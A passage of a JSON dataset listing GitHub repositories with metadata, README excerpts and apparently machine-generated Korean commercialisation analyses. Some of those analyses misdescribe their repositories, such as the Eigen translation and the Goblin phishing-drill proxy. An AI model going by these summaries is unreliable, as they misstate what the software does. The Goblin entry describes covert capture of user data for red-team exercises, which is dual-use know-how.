정렬해서 투자자들에게 추천","readme_excerpt":"[![Awesome](images/awesome.svg)](https://github.com/sindresorhus/awesome)\n\n# 🦄 Awesome Solana NFTs\n\nA curated list of resources for builders / artists hacking NFTs on Solana.\n\n- ✅ Includes: open standards, protocols, OSS repos, community-built tools\n- ✋ Excludes: individual drops, future promises (without actual code / working product)\n- 🔀 Ordering: OSS before closed-source, ordered by github stars\n\nIf you see something missing - please submit a PR 🙏\n\n## 📜 NFT Open Standards\n\n- [Metaplex Token Metadata Standard](https://github.com/metaplex-foundation/metaplex-program-library/tree/master/token-metadata)\n  ![](https://img.shields.io/github/stars/metaplex-foundation/metaplex.svg?style=social)\n  ([docs](https://docs.metaplex.com/token-metadata/specification#token-standards)) - defines NFT metadata (its structure, how it's stored on-chain / off-chain) and different types of NFTs (master editions, normal editions, one-offs, participation NFTs)\n- [Burnt Finance \"Collections\"](https://github.c","composite_score":0.5083,"license_safety_tag":"unknown"},{"name":"Troland/how-javascript-works","github_url":"https://github.com/Troland/how-javascript-works","stars":10,"language":"","license":"unknown","abandonment_months":41,"description":"# Troland/how-javascript-works 분석\n\n## 왜 보물인가\n웹사이트나 앱이 어떻게 작동하는지 쉽게 배울 수 있는 교육 자료로, 비전공자도 자신의 기술 이해도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 프로그래밍 입문자를 위한 구독형 온라인 강의 서비스로 운영\n2. **기업 교육용 SaaS**: ","readme_excerpt":"# how-javascript-works\n\n> Contributors: [@Troland](https://github.com/Troland/) [@三月](https://github.com/heaven2049) [@chkaos](https://github.com/chkaos)。\n>\n> 本文是翻译介绍 JavaScript 的工作原理的，该系列原文还在更新中，原文见[这里](https://blog.sessionstack.com/tagged/tutorial)。\n\n## 目录结构\n\n- 第一章：[语言引擎，运行时和调用栈概述](overview.md)\n- 第二章：[如何在 V8 引擎中书写最优代码的 5 条小技巧](v8.md)\n- 第三章：[内存管理及如何处理 4 类常见的内存泄漏](memory-management.md)\n- 第四章：[事件循环及异步编程的出现和 5 种更好的 async/await 编程方式](event-loop.md)\n- 第五章：[深入理解 WebSockets 和带有 SSE 机制的 HTTP/2 以及正确的使用姿势](http.md)\n- 第六章：[WebAssembly 对比 JavaScript 及其使用场景](webassembly.md)\n- 第七章：[Web Workers 分类及 5 个使用场景](worker.md)\n- 第八章：[Service Workers，生命周期及其使用场景](service-worker.md)\n- 第九章：[网页消息推送通知机制](push-notifications.md)\n- 第十章：[使用 MutationObserver 监测 DOM 变化](mutation-observer.md)\n- 第十一章：[渲染引擎及性能优化小技巧](rendering.md)\n- 第十二章：[网络层探秘及如何提高其性能和安全性](networking.md)\n- 第十三章：[CSS 和 JS 动画底层原理及如何优化其性能](animation.md)\n- 第十四章：[解析，语法抽象树及最小化解析时间的 5 条小技巧](ast.md)\n- 第十五章：[类和继承及 Babel 和 TypeScript 代码转换探秘](transpiling.md)\n- 第十六章：[","composite_score":0.5082,"license_safety_tag":"unknown"},{"name":"ahmedeltaher/MVVM-Kotlin-Android-Architecture","github_url":"https://github.com/ahmedeltaher/MVVM-Kotlin-Android-Architecture","stars":5,"language":"Kotlin","license":"Apache-2.0","abandonment_months":24,"description":"# MVVM-Kotlin-Android-Architecture 분석\n\n## 왜 보물인가\n안드로이드 앱을 빠르고 안정적으로 만들 수 있는 기본 설계도를 제공하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 교육 플랫폼**: 신입 개발자들이 올바른 앱 구조를 배울 수 있는 온라인 강좌나 부트캠프에서 교재로 활용\n2. **스타트","readme_excerpt":"# [Model-View-ViewModel (ie MVVM)](https://github.com/ahmedeltaher/Android-MVVM-architecture)\n\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-android--best--practices-brightgreen.svg?style=flat)](https://android-arsenal.com/details/3/4975)  [![kotlin](https://img.shields.io/badge/Kotlin-1.4.xxx-brightgreen.svg)](https://kotlinlang.org/)  [![coroutines](https://img.shields.io/badge/coroutines-asynchronous-red.svg)](https://kotlinlang.org/docs/reference/coroutines-overview.html)  [![Mockk](https://img.shields.io/badge/Mockk-testing-yellow.svg)](https://mockk.io/)      [![Junit5](https://img.shields.io/badge/Junit5-testing-yellowgreen.svg)](https://junit.org/junit5/)   [![Espresso](https://img.shields.io/badge/Espresso-testing-lightgrey.svg)](https://developer.android.com/training/testing/espresso/)  [![Dagger 2](https://img.shields.io/badge/Dagger-2.xx-orange.svg)](https://google.github.io/dagger/)  [![Kotlin-Android-Extensions ](https://img.shields.io/badge/Kotlin--","composite_score":0.5082,"license_safety_tag":"safe"},{"name":"btholt/complete-intro-to-react-v6","github_url":"https://github.com/btholt/complete-intro-to-react-v6","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":44,"description":"# btholt/complete-intro-to-react-v6 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필수적인 React라는 도구를 처음부터 배울 수 있는 완전한 교육 자료로, 수천 명의 개발자가 이미 학습했을 만큼 검증된 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 이 강좌를 유료 구독 형식으로 제공하는 학습 웹사이","readme_excerpt":"[![Complete Intro to Linux and the CLI](/lessons/images/Wordmark-XL.png)][course]\n\n[![Frontend Masters](https://static.frontendmasters.com/assets/brand/logos/full.png)][fem]\n\n[Please click here][course] to head to the course website.\n\n# Issues and Pull Requests\n\nPlease file issues and open pull requests here! Thank you! For issues with project files, either file issues on _this_ repo _or_ open a pull request on the projects repos. This repo itself is the course website.\n\n# Project Files\n\n[Please go here][project] for the project files.\n\n# License\n\nThe content of this workshop is licensed under CC-BY-NC-4.0. Feel free to share freely but do not resell my content.\n\nThe code, including the code of the site itself and the code in the exercises, are licensed under Apache 2.0.\n\n[fem]: https://frontendmasters.com/courses/complete-react-v6/\n[course]: https://bit.ly/react-6\n[project]: https://github.com/btholt/citr-v6-project/\n","composite_score":0.5082,"license_safety_tag":"unknown"},{"name":"rustcc/writing-an-os-in-rust","github_url":"https://github.com/rustcc/writing-an-os-in-rust","stars":5,"language":"Rust","license":"NOASSERTION","abandonment_months":36,"description":"# rustcc/writing-an-os-in-rust 분석\n\n## 왜 보물인가\n컴퓨터의 기본 운영체제를 직접 만드는 방법을 배울 수 있는 교육 자료로, 기술 인력 양성에 매우 가치 있는 리소스입니다.\n\n## 어디에 쓸 수 있나\n1. **기술 교육 플랫폼**: 대학교나 온라인 코딩 학원에서 고급 과정 커리큘럼으로 판매\n2. **기업 직원 교육**: IT 회","readme_excerpt":"# writing-an-os-in-rust\n\n《编写 Rust 语言的操作系统》简体中文翻译\n\n## 目录\n\n### 正文\n\n| 序号 | 标题             | 链接                                              | 源文件                                   | 状态    | 长度    |\n| ---- | ---------------- | ------------------------------------------------- | ---------------------------------------- | ------- | ------- |\n| 一   | 独立式可执行程序 | [知乎专栏](https://zhuanlan.zhihu.com/p/53064186) | [点我](./01-freestanding-rust-binary.md) | Done    | 11 千字 |\n| 二   | 最小化内核       | [知乎专栏](https://zhuanlan.zhihu.com/p/56433770) | [点我](./02-minimal-rust-kernel.md)      | Done    | 19 千字 |\n| 三   | VGA 字符模式     | [知乎专栏](https://zhuanlan.zhihu.com/p/53745617) | [点我](./03-vga-text-mode.md)            | Done    | 21 千字 |\n| 四   | 内核测试         | [知乎专栏](https://zhuanlan.zhihu.com/p/90758552) | [点我](./04-testing.md)                  | Done    | 27 千字 |\n| 五   | CPU 异常         | 待添加                                            | [点我](./05-cpu-exceptions.md)           | Pending | -       |\n| 六   | 双重异常","composite_score":0.5082,"license_safety_tag":"unknown"},{"name":"olafsulich/fullstack-nextjs-ecommerce","github_url":"https://github.com/olafsulich/fullstack-nextjs-ecommerce","stars":25,"language":"TypeScript","license":"unknown","abandonment_months":54,"description":"# olafsulich/fullstack-nextjs-ecommerce 분석\n\n## 왜 보물인가\n온라인 쇼핑몰을 만드는 데 필요한 모든 기술이 미리 정리되어 있어서, 처음부터 다시 만들 필요 없이 바로 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 소상공인을 위한 \"쉬운 쇼핑몰 구축 플랫폼\" – 코딩 없이 자신의 쇼핑몰을 ","readme_excerpt":"<h1 align=\"center\">\n\n<br>\n\n<img src=\"https://user-images.githubusercontent.com/46969484/143662399-baaa3db0-12fa-4455-9c0c-56b7c5f96552.png\" width=\"100%\" />\n\n<br>\n\n<br>\n\nFullstack Next.js E-commerce\n\n</h1>\n\n## Technologies 🔧\n\n- Next.js(React)\n- TypeScript\n- Prisma\n- NextAuth\n- Stripe\n- Tailwind\n- React Query\n- Sentry\n- Yup\n\n## Screenshots 📸\n\n<br>\n\n<img src=\"https://user-images.githubusercontent.com/46969484/143662639-de569e93-917c-40d8-b4ff-efbd6e6e82f3.png\" width=\"100%\" />\n\n<br>\n\n<img src=\"https://user-images.githubusercontent.com/46969484/143662647-7fb16f8e-f982-46a3-ad92-e5cd357fe025.png\" width=\"100%\" />\n\n<br>\n\n## Code Example/Issues 🔍\n\nIf you have any issues, please let me know in the issues section or directly to olafsulich@gmail.com\n\n## Installation 💾\n\n```bash\ngit clone https://github.com/olafsulich/fullstack-nextjs-ecommerce.git\n```\n\nFill your `.env` variables:\n\n```\nPOSTGRES_USER=\nPOSTGRES_PASSWORD=\nPOSTGRES_DB=\nDATABASE_URL=\"postgresql://<POSTGRES_USER>:<POSTGRES_PASSWORD>@<POST","composite_score":0.5081,"license_safety_tag":"unknown"},{"name":"xiecat/goblin","github_url":"https://github.com/xiecat/goblin","stars":5,"language":"Go","license":"GPL-3.0","abandonment_months":36,"description":"# Goblin 저장소 분석\n\n## 왜 보물인가\n매우 초기 단계의 프로젝트로, 개발자들 사이에서 아직 많이 알려지지 않은 숨은 기술이지만, GPL-3.0 라이선스로 자유롭게 사용할 수 있는 오픈소스입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 자동화 도구**: 회사의 반복적인 데이터 처리 작업을 자동으로 수행하는 소프트웨어 판매\n2. **API 기","readme_excerpt":"# :fishing_pole_and_fish: Goblin 钓鱼演练工具\n\n[![Latest release](https://img.shields.io/github/v/release/xiecat/goblin)](https://github.com/xiecat/goblin/releases/latest)\n![GitHub Release Date](https://img.shields.io/github/release-date/xiecat/goblin)\n![GitHub All Releases](https://img.shields.io/github/downloads/xiecat/goblin/total)\n[![GitHub issues](https://img.shields.io/github/issues/xiecat/goblin)](https://github.com/xiecat/goblin/issues)\n[![Docker Pulls](https://img.shields.io/docker/pulls/becivells/goblin)](https://hub.docker.com/r/becivells/goblin)\n![Docker Image Size (latest by date)](https://img.shields.io/docker/image-size/becivells/goblin)        \nGoblin 是一款适用于红蓝对抗的钓鱼演练工具。通过反向代理，可以在不影响用户操作的情况下无感知的获取用户的信息，或者诱导用户操作。也可以通过使用代理方式达到隐藏服务端的目的。内置插件，通过简单的配置，快速调整网页内容以达到更好的演练效果\n\n[:ledger: English README](https://github.com/xiecat/goblin/blob/master/README_EN.md)   |   [:pushpin: 下载地址](https://github.com/xiecat/goblin/releases)    |   [:book: 使用文档](https://goblin.xiecat.fun/)\n\n## :collision:","composite_score":0.5081,"license_safety_tag":"restricted"},{"name":"ZainCheung/netease-cloud","github_url":"https://github.com/ZainCheung/netease-cloud","stars":5,"language":"Python","license":"MIT","abandonment_months":22,"description":"# 네이즈 클라우드(Netease Cloud) 저장소 분석\n\n## 왜 보물인가\n네이즈 뮤직의 음악 데이터에 접근할 수 있는 도구로, 음악 스트리밍 서비스나 음악 관련 앱을 만드는 개발자들에게 매우 유용한 자산입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 음악 추천 앱 (SaaS 서비스)**\n사용자의 취향에 맞는 음악을 자동으로 찾아주는 웹/앱 서비스로 월 ","readme_excerpt":"# 网易云音乐升级全家桶\n\n<p align=\"center\">\n    <a href=\"https://github.com/ZainCheung\"><img alt=\"Author\" src=\"https://img.shields.io/badge/author-ZainCheung-blueviolet\"/></a>\n    <img alt=\"PHP\" src=\"https://img.shields.io/badge/code-Python-success\"/>\n    <img src=\"https://github-visitor-badge.glitch.me/badge?page_id=ZainCheung.netease-cloud\"/>\n</p>\n通过调用官方接口，每天自动刷完300首歌，借此可以达到快速升级的目的。\n\n一个账号平均耗时为1分钟左右。放在服务器运行即可不需要人工干预，支持无服务器的云函数部署，每天自动听歌做任务，向你的微信发送任务通知。\n\n------\n\n\n\n### 使用文档: [https://zaincheung.github.io/netease-cloud](https://zaincheung.github.io/netease-cloud)\n\n\n\n目前已实现功能：\n\n\n- [x]  每天自动升级\n- [x] 任务进度推送到微信\n- [x] 自定义网易云日推风格\n\n本项目实则由三个项目组成，分别是：\n\n- 给账号升级的Python项目：[netease-cloud](https://github.com/ZainCheung/netease-cloud)\n\n- 使用PHP搭建的API接口：[netease-cloud-api](https://github.com/ZainCheung/netease-cloud-api)\n\n- 使用Python开发的修改日推（每日推荐歌曲）Windows软件：[netease-cloud-fast](https://github.com/ZainCheung/netease-cloud-fastplay)\n","composite_score":0.5081,"license_safety_tag":"safe"},{"name":"mCyp/Hoo","github_url":"https://github.com/mCyp/Hoo","stars":5,"language":"Kotlin","license":"unknown","abandonment_months":58,"description":"# mCyp/Hoo 상용화 분석\n\n## 왜 보물인가\n저장소 정보가 제한적(설명 없음, 라이선스 미확인, 마지막 업데이트 2021년 8월)이어서 이 프로젝트의 실제 기능과 가치를 파악하기 어렵습니다.\n현재 공개된 정보만으로는 시장성 있는 솔루션인지 판단할 수 없으니 깊이 있는 조사가 필수입니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 프로젝트의 ","readme_excerpt":"# Hoo\n\n🚀 Hoo是一个利用`Android Jetpack`架构组件编写的`MVVM模式`的入门级App，目的是**用于指导新手使用`Android Jetpack`**。\n\n|                             图片                             |                             图片                             |\n| :----------------------------------------------------------: | :----------------------------------------------------------: |\n| ![登录注册](https://github.com/mCyp/Hoo/blob/master/pic/register.gif) | ![选择](https://github.com/mCyp/Hoo/blob/master/pic/select.gif) |\n| ![收藏鞋子](https://github.com/mCyp/Hoo/blob/master/pic/favourite.gif) | ![选择头像](https://github.com/mCyp/Hoo/blob/master/pic/header.gif) |\n\n## 一、 学习须知\n\n🚀 本系列文章会教您如何使用`Android Jetpack`从零到一构建一个简单`MVVM模式`的App。随着Demo的完善，代码会发生变更，如果想查看Blog里面的代码，记得使用版本控制，最新文章的Demo不需要回退版本。**如有新的`Android Jetpack`组件，本项目也会及时更新。**\n\n### Navigation 2019/5/21\n\n文章地址：\n\n> [《即学即用Android Jetpack - Navigation》](https://www.jianshu.com/p/66b93df4b7a6)\n\n代码若与Blog中不同，记得将代码库回退到`Tag`为`navigation`的版本。\n\n### Data Binding 2019/5/29\n\n文章地址：\n\n> [《即学即用Android Jetpack - ","composite_score":0.5081,"license_safety_tag":"unknown"},{"name":"fchollet/ARC","github_url":"https://github.com/fchollet/ARC","stars":13,"language":"JavaScript","license":"Apache-2.0","abandonment_months":14,"description":"# ARC 저장소 분석 리포트\n\n## 왜 보물인가\nAI가 자신의 답변이 맞는지 검증하는 능력을 강화하는 핵심 데이터셋으로, AI의 신뢰성 문제를 해결하는 데 직접 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업용 AI 검증 SaaS**: 회사의 AI 시스템이 내놓은 결과가 정말 맞는지 자동으로 확인해주는 구독 서비스\n2. **금융/의료 내부","readme_excerpt":"# Abstraction and Reasoning Corpus for Artificial General Intelligence v1 (ARC-AGI-1)\n\nThis repository contains the ARC-AGI-1 task data, as well as a browser-based interface for humans to try their hand at solving the tasks manually.\n\nSee also the [ARC-AGI-2 repository](https://github.com/arcprize/ARC-AGI-2).\n\n*\"ARC can be seen as a general artificial intelligence benchmark, as a program synthesis benchmark, or as a psychometric intelligence test. It is targeted at both humans and artificially intelligent systems that aim at emulating a human-like form of general fluid intelligence.\"*\n\nA complete description of the dataset, its goals, and its underlying logic, can be found in: [On the Measure of Intelligence](https://arxiv.org/abs/1911.01547).\n\nAs a reminder, a test-taker is said to solve a task when, upon seeing the task for the first time, they are able to produce the correct output grid for *all* test inputs in the task (this includes picking the dimensions of the output grid). For ","composite_score":0.508,"license_safety_tag":"safe"},{"name":"TSiege/Tech-Interview-Cheat-Sheet","github_url":"https://github.com/TSiege/Tech-Interview-Cheat-Sheet","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":23,"description":"# Tech-Interview-Cheat-Sheet 분석\n\n## 왜 보물인가\n취업 면접을 준비하는 사람들이 기술 질문에 대한 답변을 빠르게 찾을 수 있는 정리된 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 구직자 대상 구독형 면접 준비 플랫폼으로, 답변 피드백 및 진도 추적 기능을 추가하여 월 구독료 수익화\n2. **내부 업","readme_excerpt":"# Tech Interview Cheat Sheet\n\nThis list is meant to be both a quick guide and reference for further research into these topics. It's basically a summary of that comp sci course you never took or forgot about, so there's no way it can cover everything in depth.\n\n## Contributing\nThis is an open source, community project, and I am grateful for all the help I can get. If you find a mistake make a PR and please have a source so I can confirm the correction. If you have any suggestions feel free to open an issue.\n\n## Challenges\nThis project now has actual code challenges! This challenges are meant to cover the topics you'll read below. Maybe you'll see them in an interview and maybe you won't. Either way you'll probably learn something new. [Click here for more](./challenges/README.md)\n\n# Table of Content\n- [Asymptotic Notation](#asymptotic-notation)\n- [Data Structures](#data-structures)\n  - [Array](#array)\n  - [Linked List](#linked-list)\n  - [Hash Table or Hash Map](#hash)\n  - [Binary Tree]","composite_score":0.508,"license_safety_tag":"safe"},{"name":"THUDM/CogView","github_url":"https://github.com/THUDM/CogView","stars":38,"language":"Python","license":"Apache-2.0","abandonment_months":32,"description":"# CogView 프로젝트 평가\n\n## 왜 보물인가\n텍스트를 입력하면 그에 맞는 이미지를 자동으로 생성해주는 AI 기술로, 광고·마케팅·디자인 업계에서 창작 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이미지 자동생성 SaaS**: 사용자가 설명글만 입력하면 광고배너, SNS게시물 이미지를 즉시 생성해주는 웹서비스\n2. **마","readme_excerpt":"<p align=\"center\">\n    <img src=\"assets/logo.png\"/>\n</p>\n<p align=\"center\">\n<b>Generate vivid Images for <i>Any</i> (Chinese) text</b>\n</p>\n\n![teaser](assets/cogviewcase.png)\n\n**News!** The paper of ImageReward is accepted by NeurIPS 2023!\n\n**News!** The codes of ImageReward ([paper link](https://arxiv.org/abs/2304.05977.pdf)) have been released at https://github.com/THUDM/ImageReward! ImageReward is the first general-purpose text-to-image human preference RM.\n\n**News!** The codes of CogView2 ([paper link](https://arxiv.org/pdf/2105.13290.pdf)) have been released at https://github.com/THUDM/CogView2! \n\n**News!** The [demo](https://agc.platform.baai.ac.cn/CogView/index.html) for a better and faster CogView2 (formal version, March 2022) is available! The lastest model also supports English input, but to translate them into Chinese often could be better.\n\n**News!** The [demo](https://agc.platform.baai.ac.cn/CogView/index.html) for a better and faster CogView2 (new version) is available!\n\n","composite_score":0.5079,"license_safety_tag":"safe"},{"name":"qixianyu-buaa/EigenChineseDocument","github_url":"https://github.com/qixianyu-buaa/EigenChineseDocument","stars":7,"language":"C++","license":"unknown","abandonment_months":34,"description":"# EigenChineseDocument 평가 보고서\n\n## 왜 보물인가\n중국어 문서를 자동으로 분석하고 정리할 수 있는 도구로, 중국 시장과 거래하는 기업들의 문서 처리 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중국 수입업체, 제조 회사들이 중국 공급업체 문서를 자동 번역·분석하는 구독형 플랫폼\n- *","readme_excerpt":"# Eigen教程\n\n## 目的\n这是我学习Eigen时翻译的Eigen[官方文档](http://eigen.tuxfamily.org/dox/modules.html)。\n翻译的主要原因在于：\n- 与其只在用到某一部分的时候查找API，不如先进行初步的整体学习，建立知识体系，益于程序的编写和解Bug;\n- 不知为何，英文文档不能一目十行，所以还是翻译一下，利于再次使用时的快速访问和理解;\n- 在百度，github等网站未能找到中文版的文档;\n- 官方文档中的代码不利于在本地运行，每次还得复制粘贴，编译运行，个人认为较为麻烦;\n- 为后来者种一棵小树，方便大家快速掌握Eigen。\n\n当前文档已初步完成，内容肯定需要改善。\n\n## 版本\nEigen  3.3.7\n\n请注意，此程序在3.2版本下会报错!请您确保版本的正确，或者您需要注释掉源码中的部分内容！\n\n## 翻译说明\n此文档按照官方教程的结构体系，我把相关内容全部放入到C++代码中，\n为了防止命名冲突，使用了两层命名空间，例如:\n```\nChapter1_DenseMatrixAndArrary::Section1_MatrixClass::CoefficientAccessors();\nChapter1_DenseMatrixAndArrary::Section1_MatrixClass::MatrixAndVectorRunTime();\nChapter1_DenseMatrixAndArrary::Section3_ArrayAndCoefficientwiseOperations::AdditionAndSubtraction();\n```\n\n我并不是逐字翻译，某些部分也添加了自己的理解，并且叙述的应该是十分口水话。\n当然，部分内容也是机器翻译的，但是我想它并不影响理解。\n此外，可能去掉了文档中比较简单的内容，文档中的Reference也没有翻译(东西太多，本质原因，懒)。\n\n\n## 当前进展\n1. 第一章翻译完成，代码测试通过，见Chapter1_DenseMatrixAndArrary文件夹；\n2. 第二章翻译完成，代码测试通过，见Chapter2_DenseLinearProblemsAndDecompositions文件夹；\n3. 第三章和第四章翻译完成，但是这两章的代码较少，较多的是翻译的内","composite_score":0.5079,"license_safety_tag":"unknown"},{"name":"h0mbre/Learning-C","github_url":"https://github.com/h0mbre/Learning-C","stars":19,"language":"C","license":"unknown","abandonment_months":24,"description":"# h0mbre/Learning-C 저장소 분석\n\n## 왜 보물인가\n프로그래밍의 기초가 되는 C 언어를 체계적으로 배울 수 있는 학습 자료 모음으로, 초보자도 단계별로 따라하며 코딩 능력을 키울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 실무 프로그래밍 입문 강좌의 교재로 판매 (Udemy, 우데미 같은 사이트)\n2. **기","readme_excerpt":"## Learning C\nThis repo is a collection of assignments and mini-programs/projects for beginners trying to learn C.\n\n**WARNING: During this excercise you will be learning along with me, I am not your teacher, but your peer. I don't know anything about writing robust/correct C, I'm learning just as you are learning. Do not think that these examples are correct.**\n\nTry to complete each task without looking at the solution!\n","composite_score":0.5079,"license_safety_tag":"unknown"},{"name":"baidu/bfe-book","github_url":"https://github.com/baidu/bfe-book","stars":13,"language":"","license":"CC-BY-4.0","abandonment_months":29,"description":"# baidu/bfe-book 보물 분석\n\n## 왜 보물인가\n웹사이트의 앞단(사용자가 보는 부분)을 효율적으로 관리하는 방법을 배울 수 있는 종합 가이드북입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 성능 최적화 SaaS**: 기업의 웹사이트 속도를 자동으로 개선해주는 구독 서비스\n2. **웹팀 내부 교육 도구**: 개발팀과 운영팀이 함께 학습할 수","readme_excerpt":"# In-depth Understanding of BFE\nEnglish | [中文](./README-CN.md)\n\nThis book focuses on BFE open source project, introduces the relevant technical principles of network access, explains the design idea of BFE open source software, and how to build a network front-end platform based on BFE open source software. Readers with development capabilities can also develop BFE extension modules according to their own needs or contribute code to BFE open source projects according to the instructions in this book.\n\n\n## BFE Open Source Project\n\nBFE is Baidu's unified layer-7 load balancing platform. The BFE platform has been under construction since 2012. By the end of 2020, the BFE platform has forwarded more than trillions of requests per day, with a daily peak of more than 10 million QPS, which has great influence in the industry. In July 2019, BFE's forwarding engine was open-sourced, and was accepted by CNCF (Cloud Native Computing Foundation) as the \"Sandbox Project\" in June 2020.\n\nAddress of B","composite_score":0.5079,"license_safety_tag":"unknown"},{"name":"keycloak/keycloak-nodejs-admin-client","github_url":"https://github.com/keycloak/keycloak-nodejs-admin-client","stars":5,"language":"","license":"unknown","abandonment_months":38,"description":"# Keycloak Node.js 관리자 클라이언트 평가\n\n## 왜 보물인가\n사용자 로그인 관리 시스템을 쉽게 운영할 수 있도록 도와주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 여러 회사가 함께 사용하는 클라우드 서비스에서 각 회사별 사용자 계정을 안전하게 관리\n2. **내부 업무 도구**: 회사 직원들의 접근 권한을 ","readme_excerpt":"## Keycloak Admin Client\n\n> **Warning**\n> The Admin Client has been moved to the [Keycloak repository](https://github.com/keycloak/keycloak/tree/main/js/libs/keycloak-admin-client). Please open any new issues and PRs on that repository.\n","composite_score":0.5079,"license_safety_tag":"unknown"},{"name":"TobiasLee/Text-Classification","github_url":"https://github.com/TobiasLee/Text-Classification","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":69,"description":"# Text-Classification 저장소 분석\n\n## 왜 보물인가\n텍스트를 자동으로 분류하는 기술로, 이메일 스팸 필터나 고객 의견 분석처럼 일상의 많은 문제를 자동으로 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 리뷰 감정 분석 도구 (긍정/부정/중립 자동 판별)\n- **내부 업무 도구**: 회사 이메일을 자동으","readme_excerpt":"# Text-Classification\nImplement some state-of-the-art text classification models with TensorFlow.\n\n## Requirement\n\n- Python3\n- TensorFlow >= 1.4\n\nNote: Original code is written in TensorFlow 1.4, while the `VocabularyProcessor` is depreciated, updated code changes to use `tf.keras.preprocessing.text` to do preprocessing. The **new** preprocessing function is named `data_preprocessing_v2`\n\n## Dataset\n\nYou can load the data with\n\n```python\ndbpedia = tf.contrib.learn.datasets.load_dataset('dbpedia', test_with_fake_data=FLAGS.test_with_fake_data)\n```\n\nOr download it from [Baidu Yun](https://pan.baidu.com/s/1hz4Oh9A4udLzFjudyVDazw).\n\n## Attention is All Your Need\n\nPaper: [Attention Is All You Need](http://arxiv.org/abs/1605.07725)\n\nSee multi_head.py\n\nUse self-attention where **Query = Key = Value = sentence after word embedding**\n\nMultihead Attention module is implemented by [Kyubyong](https://github.com/Kyubyong/transformer)\n\n## IndRNN for Text Classification\n\nPaper: [Independently Recurre","composite_score":0.5078,"license_safety_tag":"safe"},{"name":"dpirch/libfvad","github_url":"https://github.com/dpirch/libfvad","stars":6,"language":"C","license":"BSD-3-Clause","abandonment_months":26,"description":"# libfvad 상업화 분석\n\n## 왜 보물인가\n음성에서 사람의 말하는 부분만 자동으로 감지하는 기술로, 음성 서비스의 처리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음성 전사 SaaS**: 녹음 파일에서 말하는 부분만 자동 추출 후 텍스트 변환 서비스 제공\n2. **콜센터 분석 도구**: 상담사와 고객의 대화 구간만 자동 감지","readme_excerpt":"# libfvad: voice activity detection (VAD) library #\n[![Build Status](https://travis-ci.org/dpirch/libfvad.svg?branch=master)](https://travis-ci.org/dpirch/libfvad)\n\nThis is a fork of the VAD engine that is part of the WebRTC Native Code package\n(https://webrtc.org/native-code/), for use as a standalone library independent\nfrom the rest of the WebRTC code. There are currently no changes in\nfunctionality.\n\n## Building and Installing ##\nlibfvad uses autoconf/automake and can be build and installed with the usual:\n```\n./configure\nmake\nsudo make install\n```\n\n - When building from the cloned git repository (instead of a downloaded release),\n   run `autoreconf -i` to create the missing *configure* script (this requires autoconf, libtool and pkg-config; e.g. run `sudo apt install autoconf libtool pkg-config` on Debian/Ubuntu first).\n - An optional example can be enabled enabled by `./configure --enable-examples`.\n   This requires libsndfile (http://www.mega-nerd.com/libsndfile/, e.g.\n   `apt i","composite_score":0.5078,"license_safety_tag":"safe"},{"name":"salesforce/pytorch-qrnn","github_url":"https://github.com/salesforce/pytorch-qrnn","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":52,"description":"# PyTorch QRNN 저장소 분석\n\n## 왜 보물인가\n텍스트 처리 속도를 획기적으로 높일 수 있는 핵심 기술로, 챗봇이나 번역 서비스 같은 AI 서비스의 성능을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 실시간 채팅 번역 플랫폼 (메시지를 빠르게 처리하여 응답 속도 개선)\n2. **내부 업무 도구**: 기업 고","readme_excerpt":"# Quasi-Recurrent Neural Network (QRNN) for PyTorch\n\nUpdated to support multi-GPU environments via `DataParallel` - see the the `multigpu_dataparallel.py` example.\n\nThis repository contains a PyTorch implementation of [Salesforce Research](https://einstein.ai/)'s [Quasi-Recurrent Neural Networks](https://arxiv.org/abs/1611.01576) paper.\n\nThe QRNN provides similar accuracy to the LSTM but can be betwen 2 and 17 times faster than the highly optimized NVIDIA cuDNN LSTM implementation depending on the use case.\n\nTo install, simply run:\n\n`pip install cupy pynvrtc git+https://github.com/salesforce/pytorch-qrnn`\n\nIf you use this code or our results in your research, please cite:\n\n```\n@article{bradbury2016quasi,\n  title={{Quasi-Recurrent Neural Networks}},\n  author={Bradbury, James and Merity, Stephen and Xiong, Caiming and Socher, Richard},\n  journal={International Conference on Learning Representations (ICLR 2017)},\n  year={2017}\n}\n```\n\n## Software Requirements\n\nThis codebase requires Python","composite_score":0.5078,"license_safety_tag":"safe"},{"name":"MichaelKoczwara/Awesome-CobaltStrike-Defence","github_url":"https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence","stars":6,"language":"","license":"MIT","abandonment_months":47,"description":"# Awesome-CobaltStrike-Defence 분석\n\n## 왜 보물인가\n기업의 컴퓨터 시스템을 노리는 해킹 공격(특히 코발트스트라이크 악성도구)으로부터 방어하는 방법들을 한곳에 모아놓은 실용적인 보안 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 SaaS**: 중소기업 대상 위협 탐지 및 차단 클라우드 서비스로 패키징\n2. **내부 ","readme_excerpt":"# Awesome-CobaltStrike-Defence\n<h1>Defences against Cobalt Strike</h1>\n\n<strong>Cobalt Strike is a commercial, full-featured, penetration testing tool which bills itself as \"adversary 